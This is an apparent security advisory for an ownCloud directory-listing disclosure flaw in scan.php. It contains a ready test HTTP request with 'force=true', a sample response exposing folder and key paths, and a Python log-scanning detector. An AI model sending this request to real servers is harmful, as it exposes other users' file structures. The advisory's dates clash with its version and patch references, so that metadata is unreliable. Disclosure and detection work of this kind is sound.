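ownCloud Information Disclosure Vulnerability (CVE-2015-1498)
Release date: 2015-01-07
Last updated: 2015-01-08
Affected systems: ownCloud ownCloud <= 8.2.1
ownCloud ownCloud <= 8.1.4
ownCloud ownCloud <= 8.0.9
Description:
CVE(CAN) ID:
CVE-2015-1498
ownCloud is an open-source file synchronization and sharing solution.
The directory listing in ownCloud <= 8.2.1, <= 8.1.4 and <= 8.0.9 contains an information disclosure vulnerability. The flaw is in the 'force' parameter of index.php/apps/files/ajax/scan.php: by setting this parameter to 'true', an attacker can obtain the complete directory structure and information about all of its files.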
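<*Source: Adam Mariš
*>
Test method:
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Adam Mariš provided the following test method: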
GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Server response (shortened):
event: user
data: "[ID]"
event: folder
data: "\/"
event: count
data: 21
event: count
data: 42
event: count
data: 63
event: folder
data: "\/[ID]"
event: folder
data: "\/[ID]\/cache"
event: folder
data: "\/[ID]6\/files"
event: folder
data: "\/[ID]\/files_encryption"
[...]
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip"
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE"
event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx"
[...]
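Detection sketch for the request shown above, added here as an example and not part of the original advisory or of ownCloud: it scans web-server access logs for calls to scan.php with force=true. It assumes Apache/nginx combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path of the scan endpoint named in the advisory.
SCAN_PATH = "/index.php/apps/files/ajax/scan.php"

# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_forced_scan(target):
    """True if the request target is the scan endpoint with force=true."""
    parts = urlsplit(target)
    # Decode percent-escapes and collapse duplicate slashes before comparing.
    path = re.sub(r"/{2,}", "/", unquote(parts.path))
    if not path.endswith(SCAN_PATH):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    # Assumption: compare case-insensitively, which may over-report slightly.
    return any(v.strip().lower() == "true" for v in params.get("force", []))

def find_forced_scans(lines):
    """Return (ip, timestamp, status, dir) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_forced_scan(m["target"]):
            query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
            hits.append((m["ip"], m["ts"], int(m["status"]), query.get("dir", [""])[0]))
    return hits

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2016:10:00:01 +0000] "GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=x HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Jan/2016:10:00:09 +0000] "GET /index.php/apps/files/ajax/scan.php?dir=%2Fphotos&requesttoken=x HTTP/1.1" 200 310',
    '203.0.113.9 - - [10/Jan/2016:10:02:44 +0000] "GET /owncloud//index.php/apps/files/ajax/scan%2Ephp?dir=&force=%74rue HTTP/1.1" 200 4980',
    '203.0.113.9 - - [10/Jan/2016:10:03:00 +0000] "GET /index.php/apps/files/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, ts, status, directory in find_forced_scans(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} dir={directory!r} forced scan request")
```

A hit with status 200 and an empty dir value corresponds to the request form in the test method; matches are leads for review, since the log alone does not show what the response contained.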
Recommendation:
Vendor patch:
ownCloud
--------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:
https://owncloud.org/security/advisory/?id=oc-sa-2016-002